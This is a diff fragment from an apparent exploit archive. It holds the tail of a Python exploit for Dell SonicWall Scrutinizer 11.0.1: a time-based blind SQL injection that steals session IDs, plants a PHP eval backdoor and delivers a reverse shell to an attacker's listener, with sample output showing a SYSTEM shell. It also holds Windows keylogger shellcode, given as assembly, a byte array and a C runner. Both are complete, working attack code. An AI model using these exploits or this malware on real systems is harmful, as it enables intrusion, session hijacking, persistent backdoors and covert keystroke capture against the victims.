+saturn:module-03 mr_me$ ./poc.py 172.16.175.147 172.16.175.1:1111
+
+	Dell SonicWall Scrutinizer <= 11.0.1 setUserSkin/deleteTab SQLi Explo!t
+	mr_me@offensive-security.com
+
+(+) target is vuln, proceeding
+(+) waiting for session data... starting at: 2016-05-06 16:31:37.022818
+(+) awesome, appears like someone has logged in... 
+(+) it took 0:00:05.020670 to detect valid session data
+(+) extracting session data... 1:NfS5yetP49TXCqP5
+(+) backdooring target...
+(+) starting handler on port 1111
+(+) connection from 172.16.175.147
+(+) pop thy shell!
+whoami
+nt authority\system
+ipconfig
+
+Windows IP Configuration
+
+
+Ethernet adapter Local Area Connection:
+
+   Connection-specific DNS Suffix  . : localdomain
+   IP Address. . . . . . . . . . . . : 172.16.175.147
+   Subnet Mask . . . . . . . . . . . : 255.255.255.0
+   Default Gateway . . . . . . . . . : 172.16.175.2
+*** Connection closed by remote host ***
+"""
+import re
+import sys
+import requests
+import datetime
+import socket
+import telnetlib
+import email.utils as eut
+from threading import Thread
+from base64 import b64encode as b64e
+
+lower_value = 0
+upper_value = 126
+
+def banner():
+	return """\n\tDell SonicWall Scrutinizer <= 11.0.1 setUserSkin/deleteTab SQLi Explo!t\n\tmr_me@offensive-security.com\n"""
+
+def ct():
+	return datetime.datetime.now()
+
+def parsedate(text):
+    return datetime.datetime(*eut.parsedate(text)[:6])
+
+def check_args():
+    global target, lserver, lport
+    if len(sys.argv) < 3:
+        return False
+    cb = sys.argv[2]
+    target = "http://%s" % sys.argv[1]
+    if not ":" in cb:
+    	return False
+    if not cb.split(":")[1].isdigit():
+    	return False
+    lserver = cb.split(":")[0]
+    lport   = int(cb.split(":")[1])
+    return True
+
+def validate():
+    r = requests.get("%s/index.html" % target)
+    if re.search('Scrutinizer 11.0.1', r.text):
+        return True
+    return False
+
+def have_sessions(time):
+    """
+    check if we have sessions
+    """   	
+    sqli = "if(ascii(substring((select count(session_id) from sessions),1,1))!=48,sleep(%s),null)" % (time)
+    url = "d4d/login.php?setSkin=1&user_id=setSkin=1&user_id=%s" % sqli
+    st = ct()
+    r = requests.get("%s/%s" % (target, url))
+    delta = ct()-st
+    if int(delta.seconds) < time:
+        return False
+    return True
+
+def do_time_based_blind(sql, time):
+    lower = lower_value
+    upper = upper_value
+    while lower < upper:
+        try:
+            mid = (lower + upper) / 2
+            url = "%s/%s" % (target, ("%s>%s,sleep(%s),null)" % (sql, str(mid), time)))
+            st = ct()
+            r = requests.get(url)
+            delta = ct()-st
+            if int(delta.seconds) >= time:
+                lower = mid + 1
+            else:
+                upper = mid
+        except (KeyboardInterrupt, SystemExit):
+            raise
+        except:
+            pass
+ 
+    if lower > lower_value and lower < upper_value:
+        value = lower
+    else:
+        url = "%s/%s" % (target, ("%s=%s,sleep(%s),null)" % (sql, str(lower), time)))
+        st = ct()
+        r = requests.get(url)
+        delta = ct()-st
+        if int(delta.seconds) >= time:
+            value = lower
+    return value
+
+def steal_session_length():
+    xlen = ""
+    sqli    = "if(ascii(substring((select length(length(concat(user_id,0x3a,session_id))) from sessions limit 0,1),1,1))"
+    qry_str = "d4d/login.php?setSkin=1&user_id=setSkin=1&user_id=%s" % sqli
+    zlen = int(chr(do_time_based_blind(qry_str, 5)))
+    for i in range(0, zlen):
+        sqli = "if(ascii(substring((select length(concat(user_id,0x3a,session_id)) from sessions limit 0,1),%d,1))" % (i+1)
+        qry_str = "d4d/login.php?setSkin=1&user_id=setSkin=1&user_id=%s" % sqli
+        xlen += chr(do_time_based_blind(qry_str, 5))
+    return int(xlen)
+
+def steal_session(length, time):
+    session = ""
+    for i in range(0, length):
+        sqli    = "if(ascii(substring((select concat(user_id,0x3a,session_id) from sessions limit 0,1),%d,1))" % (i+1)
+        qry_str = "d4d/login.php?setSkin=1&user_id=setSkin=1&user_id=%s" % sqli
+        char = chr(do_time_based_blind(qry_str, 5))
+    	session += char
+    	sys.stdout.write(char)
+    	sys.stdout.flush() 
+    return session
+
+# build the reverse php shell
+def build_php_code():
+    phpkode  = ("""
+    @set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);""")
+    phpkode += ("""$dis=@ini_get('disable_functions');""")
+    phpkode += ("""if(!empty($dis)){$dis=preg_replace('/[, ]+/', ',', $dis);$dis=explode(',', $dis);""")
+    phpkode += ("""$dis=array_map('trim', $dis);}else{$dis=array();} """)
+    phpkode += ("""if(!function_exists('LcNIcoB')){function LcNIcoB($c){ """)
+    phpkode += ("""global $dis;if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {$c=$c." 2>&1\\n";} """)
+    phpkode += ("""$imARhD='is_callable';$kqqI='in_array';""")
+    phpkode += ("""if($imARhD('popen')and!$kqqI('popen',$dis)){$fp=popen($c,'r');""")
+    phpkode += ("""$o=NULL;if(is_resource($fp)){while(!feof($fp)){ """)
+    phpkode += ("""$o.=fread($fp,1024);}}@pclose($fp);}else""")
+    phpkode += ("""if($imARhD('proc_open')and!$kqqI('proc_open',$dis)){ """)
+    phpkode += ("""$handle=proc_open($c,array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$pipes); """)
+    phpkode += ("""$o=NULL;while(!feof($pipes[1])){$o.=fread($pipes[1],1024);} """)
+    phpkode += ("""@proc_close($handle);}else if($imARhD('system')and!$kqqI('system',$dis)){ """)
+    phpkode += ("""ob_start();system($c);$o=ob_get_contents();ob_end_clean(); """)
+    phpkode += ("""}else if($imARhD('passthru')and!$kqqI('passthru',$dis)){ob_start();passthru($c); """)
+    phpkode += ("""$o=ob_get_contents();ob_end_clean(); """)
+    phpkode += ("""}else if($imARhD('shell_exec')and!$kqqI('shell_exec',$dis)){ """)
+    phpkode += ("""$o=shell_exec($c);}else if($imARhD('exec')and!$kqqI('exec',$dis)){ """)
+    phpkode += ("""$o=array();exec($c,$o);$o=join(chr(10),$o).chr(10);}else{$o=0;}return $o;}} """)
+    phpkode += ("""$nofuncs='no exec functions'; """)
+    phpkode += ("""if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){ """)
+    phpkode += ("""$s=@fsockopen('tcp://%s','%d');while($c=fread($s,2048)){$out = ''; """ % (lserver, lport))
+    phpkode += ("""if(substr($c,0,3) == 'cd '){chdir(substr($c,3,-1)); """)
+    phpkode += ("""}elseif (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit'){break;}else{ """)
+    phpkode += ("""$out=LcNIcoB(substr($c,0,-1));if($out===false){fwrite($s,$nofuncs); """)
+    phpkode += ("""break;}}fwrite($s,$out);}fclose($s);}else{ """)
+    phpkode += ("""$s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);@socket_connect($s,'%s','%d'); """ % (lserver, lport))
+    phpkode += ("""@socket_write($s,"socket_create");while($c=@socket_read($s,2048)){ """)
+    phpkode += ("""$out = '';if(substr($c,0,3) == 'cd '){chdir(substr($c,3,-1)); """)
+    phpkode += ("""} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') { """)
+    phpkode += ("""break;}else{$out=LcNIcoB(substr($c,0,-1));if($out===false){ """)
+    phpkode += ("""@socket_write($s,$nofuncs);break;}}@socket_write($s,$out,strlen($out)); """)
+    phpkode += ("""}@socket_close($s);} """)
+    return phpkode
+
+def kill_shot(stolen_data):
+    user_id    = stolen_data.split(":")[0]
+    sessionid = stolen_data.split(":")[1]
+    url = "d4d/dashboards.php?deleteTab=1 union select '<?php eval(base64_decode($_COOKIE[\\'awae\\'])); ?>' into outfile '../../html/d4d/offsec.php'"
+    requests.get("%s/%s" % (target, url), cookies={"userid": user_id, "sessionid": sessionid})
+
+def exec_code():
+    phpkodez = b64e(build_php_code())
+    handlerthr = Thread(target=handler, args=(lport,))
+    handlerthr.start()
+    requests.get("%s/d4d/offsec.php" % (target), cookies={"awae": phpkodez})
+
+def handler(lport):
+    print "(+) starting handler on port %d" % lport
+    t = telnetlib.Telnet()
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.bind(("0.0.0.0", lport))
+    s.listen(1)
+    conn, addr = s.accept()
+    print "(+) connection from %s" % addr[0]
+    t.sock = conn
+    print "(+) pop thy shell!"
+    t.interact()
+
+def main():
+    if check_args():
+        if validate():
+            print "(+) target is vuln, proceeding"
+            st = ct()
+            print "(+) waiting for session data... starting at: %s" % ct()
+            # we dont use recursion since we could get stack exhaustion. 
+            while not have_sessions(5):
+            	pass
+            print "(+) awesome, appears like someone has logged in... "
+            print "(+) it took %s to detect valid session data" % (ct()-st)
+            sys.stdout.flush() 
+            sys.stdout.write("(+) extracting session data... ")
+            dataz = steal_session(steal_session_length(), 5)
+            print "\n(+) backdooring target..."
+            kill_shot(dataz)
+            exec_code()
+    else:
+    	print "(!) usage: %s <target> <connectback:port>" % sys.argv[0]
+
+if __name__ == "__main__":
+    print banner()
+    main()
\ No newline at end of file
diff --git a/platforms/windows/shellcode/39731.c b/platforms/windows/shellcode/39731.c
new file mode 100755
index 000000000..df966cb33
--- /dev/null
+++ b/platforms/windows/shellcode/39731.c
@@ -0,0 +1,245 @@
+/*
+; Exploit Title: All windows null free shellcode - primitave keylogger to file - 431 (0x01AF) bytes
+; Date: Sat Apr 23 18:34:25 GMT 2016
+; Exploit Author: Fugu
+; Vendor Homepage: www.microsoft.com
+; Version: all afaik
+; Tested on: Win7 (im guessing it will work on others)
+; Note: it will write to "log.bin" in the same directory as the exe, iff that DIR is writable.
+;       it is kinda spammy to the logfile, and will grow quickly. keystrokes are saved in format:
+;       "Virtual-Key Codes", from msdn.microsoft.com website
+
+section .bss
+
+section .data
+
+section .text
+   global _start
+      _start:
+    cld  								; 00000000 FC
+    xor edx,edx  							; 00000001 31D2
+    mov dl,0x30  							; 00000003 B230
+    push dword [fs:edx]  						; 00000005 64FF32
+    pop edx  								; 00000008 5A
+    mov edx,[edx+0xc]  							; 00000009 8B520C
+    mov edx,[edx+0x14]  						; 0000000C 8B5214
+loc_fh:
+    mov esi,[edx+0x28]  						; 0000000F 8B7228
+    xor eax,eax  							; 00000012 31C0
+    mov ecx,eax  							; 00000014 89C1
+    mov cl,0x3  							; 00000016 B103
+loc_18h:
+    lodsb  								; 00000018 AC
+    rol eax,byte 0x8  							; 00000019 C1C008
+    lodsb  								; 0000001C AC
+    loop loc_18h  							; 0000001D E2F9
+    lodsb  								; 0000001F AC
+    cmp eax,0x4b45524e  						; 00000020 3D4E52454B
+    jz loc_2ch  							; 00000025 7405
+    cmp eax,0x6b65726e  						; 00000027 3D6E72656B
+loc_2ch:
+    mov ebx,[edx+0x10]  						; 0000002C 8B5A10
+    mov edx,[edx]  							; 0000002F 8B12
+    jnz loc_fh  							; 00000031 75DC
+    mov edx,[ebx+0x3c]  						; 00000033 8B533C
+    add edx,ebx  							; 00000036 01DA
+    push dword [edx+0x34]  						; 00000038 FF7234
+    mov edx,[edx+0x78]  						; 0000003B 8B5278
+    add edx,ebx  							; 0000003E 01DA
+    mov esi,[edx+0x20]  						; 00000040 8B7220
+    add esi,ebx  							; 00000043 01DE
+
+;GetProcAddress
+    xor ecx,ecx  							; 00000045 31C9
+loc_47h:
+    inc ecx  								; 00000047 41
+    lodsd  								; 00000048 AD
+    add eax,ebx  							; 00000049 01D8
+    cmp dword [eax],0x50746547  					; 0000004B 813847657450
+    jnz loc_47h  							; 00000051 75F4
+    cmp dword [eax+0x4],0x41636f72  					; 00000053 817804726F6341
+    jnz loc_47h  							; 0000005A 75EB
+    cmp dword [eax+0x8],0x65726464  					; 0000005C 81780864647265
+    jnz loc_47h  							; 00000063 75E2
+    dec ecx  								; 00000065 49
+    mov esi,[edx+0x24]  						; 00000066 8B7224
+    add esi,ebx  							; 00000069 01DE
+    mov cx,[esi+ecx*2]  						; 0000006B 668B0C4E
+    mov esi,[edx+0x1c]  						; 0000006F 8B721C
+    add esi,ebx  							; 00000072 01DE
+    mov edx,[esi+ecx*4]  						; 00000074 8B148E
+    add edx,ebx  							; 00000077 01DA
+    mov edi,edx  							; 00000079 89D7
+    push edx  								; 0000007B 52
+
+;GetModuleHandleA
+    xor eax,eax  							; 0000007C 31C0
+    push eax  								; 0000007E 50
+    push dword 0x41656c64  						; 0000007F 68646C6541
+    push dword 0x6e614865  						; 00000084 686548616E
+    push dword 0x6c75646f  						; 00000089 686F64756C
+    push dword 0x4d746547  						; 0000008E 684765744D
+    push esp  								; 00000093 54
+    push ebx  								; 00000094 53
+    call edi  								; 00000095 FFD7
+    lea esp,[esp+0x14]  						; 00000097 8D642414
+    push eax  								; 0000009B 50
+
+;GetModuleHandleA("USER32.DLL")
+    push dword 0x88014c4c  						; 0000009C 684C4C0188
+    dec byte [esp+0x2]  						; 000000A1 FE4C2402
+    push dword 0x442e3233  						; 000000A5 6833322E44
+    push dword 0x52455355  						; 000000AA 6855534552
+    push esp  								; 000000AF 54
+    call eax  								; 000000B0 FFD0
+    xor edx,edx  							; 000000B2 31D2
+    cmp eax,edx  							; 000000B4 39D0
+    jnz loc_f0h  							; 000000B6 7538
+    lea esp,[esp+0xc]  							; 000000B8 8D64240C
+
+;LoadLibraryA
+    push edx  								; 000000BC 52
+    push dword 0x41797261  						; 000000BD 6861727941
+    push dword 0x7262694c  						; 000000C2 684C696272
+    push dword 0x64616f4c  						; 000000C7 684C6F6164
+    push esp  								; 000000CC 54
+    push ebx  								; 000000CD 53
+    call edi  								; 000000CE FFD7
+    lea esp,[esp+0x10]  						; 000000D0 8D642410
+    push eax  								; 000000D4 50
+
+;LoadLibraryA("USER32.DLL")
+    push dword 0x77014c4c  						; 000000D5 684C4C0177
+    dec byte [esp+0x2]  						; 000000DA FE4C2402
+    push dword 0x442e3233  						; 000000DE 6833322E44
+    push dword 0x52455355  						; 000000E3 6855534552
+    push esp  								; 000000E8 54
+    call eax  								; 000000E9 FFD0
+    lea esp,[esp+0xc]  							; 000000EB 8D64240C
+    push eax  								; 000000EF 50
+
+;GetKeyState
+loc_f0h:
+    mov edx,eax  							; 000000F0 89C2
+    push dword 0x1657461  						; 000000F2 6861746501
+    dec byte [esp+0x3]  						; 000000F7 FE4C2403
+    push dword 0x74537965  						; 000000FB 6865795374
+    push dword 0x4b746547  						; 00000100 684765744B
+    push esp  								; 00000105 54
+    push edx  								; 00000106 52
+    call edi  								; 00000107 FFD7
+    lea esp,[esp+0xc]  							; 00000109 8D64240C
+    push eax  								; 0000010D 50
+
+;WriteFile
+    push dword 0x55010165  						; 0000010E 6865010155
+    dec byte [esp+0x1]  						; 00000113 FE4C2401
+    push dword 0x6c694665  						; 00000117 686546696C
+    push dword 0x74697257  						; 0000011C 6857726974
+    push esp  								; 00000121 54
+    push ebx  								; 00000122 53
+    call edi  								; 00000123 FFD7
+    lea esp,[esp+0xc]  							; 00000125 8D64240C
+    push eax  								; 00000129 50
+
+;CreateFileA
+    push dword 0x141656c  						; 0000012A 686C654101
+    dec byte [esp+0x3]  						; 0000012F FE4C2403
+    push dword 0x69466574  						; 00000133 6874654669
+    push dword 0x61657243  						; 00000138 6843726561
+    push esp  								; 0000013D 54
+    push ebx  								; 0000013E 53
+    call edi  								; 0000013F FFD7
+    lea esp,[esp+0xc]  							; 00000141 8D64240C
+    push eax  								; 00000145 50
+
+    push dword 0x16e6962  						; 00000146 6862696E01
+    dec byte [esp+0x3]  						; 0000014B FE4C2403
+    push dword 0x2e676f6c  						; 0000014F 686C6F672E
+
+    xor ecx,ecx  							; 00000154 31C9
+    push ecx  								; 00000156 51
+    push ecx  								; 00000157 51
+    add byte [esp],0x80  						; 00000158 80042480
+    push byte +0x4  							; 0000015C 6A04
+    push ecx  								; 0000015E 51
+    push byte +0x2  							; 0000015F 6A02
+    push ecx  								; 00000161 51
+    add byte [esp],0x4  						; 00000162 80042404
+    lea ecx,[esp+0x18]  						; 00000166 8D4C2418
+    push ecx  								; 0000016A 51
+    call eax  								; 0000016B FFD0
+    lea esp,[esp+0x8]  							; 0000016D 8D642408
+    push eax  								; 00000171 50
+
+;main loop
+loc_172h:
+    xor ecx,ecx  							; 00000172 31C9
+    xor esi,esi  							; 00000174 31F6
+loc_176h:
+    mov cl,0xff  							; 00000176 B1FF
+    mov eax,esi  							; 00000178 89F0
+    cmp al,cl  								; 0000017A 38C8
+    jc loc_180h  							; 0000017C 7202
+    xor esi,esi  							; 0000017E 31F6
+loc_180h:
+    inc esi  								; 00000180 46
+    push esi  								; 00000181 56
+    call dword [esp+0x10]  						; 00000182 FF542410
+    mov edx,esi  							; 00000186 89F2
+    xor ecx,ecx  							; 00000188 31C9
+    mov cl,0x80  							; 0000018A B180
+    and eax,ecx  							; 0000018C 21C8
+    xor ecx,ecx  							; 0000018E 31C9
+    cmp eax,ecx  							; 00000190 39C8
+    jz loc_176h  							; 00000192 74E2
+
+    push edx  								; 00000194 52
+    push ecx  								; 00000195 51
+    lea ecx,[esp]  							; 00000196 8D0C24
+    push ecx  								; 00000199 51
+    push byte +0x1  							; 0000019A 6A01
+    lea ecx,[esp+0xc]  							; 0000019C 8D4C240C
+    push ecx  								; 000001A0 51
+    push dword [esp+0x14]  						; 000001A1 FF742414
+    call dword [esp+0x20]  						; 000001A5 FF542420
+    lea esp,[esp+0x4]  							; 000001A9 8D642404
+    jmp short loc_172h  						; 000001AD EBC3
+*/
+#include <stdio.h>
+#include <string.h>
+
+unsigned char sc[] = "\xfc\x31\xd2\xb2\x30\x64\xff\x32\x5a\x8b\x52\x0c\x8b\x52\x14\x8b"
+		"\x72\x28\x31\xc0\x89\xc1\xb1\x03\xac\xc1\xc0\x08\xac\xe2\xf9\xac"
+		"\x3d\x4e\x52\x45\x4b\x74\x05\x3d\x6e\x72\x65\x6b\x8b\x5a\x10\x8b"
+		"\x12\x75\xdc\x8b\x53\x3c\x01\xda\xff\x72\x34\x8b\x52\x78\x01\xda"
+		"\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74"
+		"\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64"
+		"\x64\x72\x65\x75\xe2\x49\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x8b"
+		"\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x89\xd7\x52\x31\xc0\x50\x68"
+		"\x64\x6c\x65\x41\x68\x65\x48\x61\x6e\x68\x6f\x64\x75\x6c\x68\x47"
+		"\x65\x74\x4d\x54\x53\xff\xd7\x8d\x64\x24\x14\x50\x68\x4c\x4c\x01"
+		"\x88\xfe\x4c\x24\x02\x68\x33\x32\x2e\x44\x68\x55\x53\x45\x52\x54"
+		"\xff\xd0\x31\xd2\x39\xd0\x75\x38\x8d\x64\x24\x0c\x52\x68\x61\x72"
+		"\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\xff\xd7"
+		"\x8d\x64\x24\x10\x50\x68\x4c\x4c\x01\x77\xfe\x4c\x24\x02\x68\x33"
+		"\x32\x2e\x44\x68\x55\x53\x45\x52\x54\xff\xd0\x8d\x64\x24\x0c\x50"
+		"\x89\xc2\x68\x61\x74\x65\x01\xfe\x4c\x24\x03\x68\x65\x79\x53\x74"
+		"\x68\x47\x65\x74\x4b\x54\x52\xff\xd7\x8d\x64\x24\x0c\x50\x68\x65"
+		"\x01\x01\x55\xfe\x4c\x24\x01\x68\x65\x46\x69\x6c\x68\x57\x72\x69"
+		"\x74\x54\x53\xff\xd7\x8d\x64\x24\x0c\x50\x68\x6c\x65\x41\x01\xfe"
+		"\x4c\x24\x03\x68\x74\x65\x46\x69\x68\x43\x72\x65\x61\x54\x53\xff"
+		"\xd7\x8d\x64\x24\x0c\x50\x68\x62\x69\x6e\x01\xfe\x4c\x24\x03\x68"
+		"\x6c\x6f\x67\x2e\x31\xc9\x51\x51\x80\x04\x24\x80\x6a\x04\x51\x6a"
+		"\x02\x51\x80\x04\x24\x04\x8d\x4c\x24\x18\x51\xff\xd0\x8d\x64\x24"
+		"\x08\x50\x31\xc9\x31\xf6\xb1\xff\x89\xf0\x38\xc8\x72\x02\x31\xf6"
+		"\x46\x56\xff\x54\x24\x10\x89\xf2\x31\xc9\xb1\x80\x21\xc8\x31\xc9"
+		"\x39\xc8\x74\xe2\x52\x51\x8d\x0c\x24\x51\x6a\x01\x8d\x4c\x24\x0c"
+		"\x51\xff\x74\x24\x14\xff\x54\x24\x20\x8d\x64\x24\x04\xeb\xc3";
+
+
+int main(int argc, char *argv[]){
+	printf("Shellcode length: %d\n", (int)strlen(sc));
+	(*(void(*)(void))&sc)();
+	return 0;
+}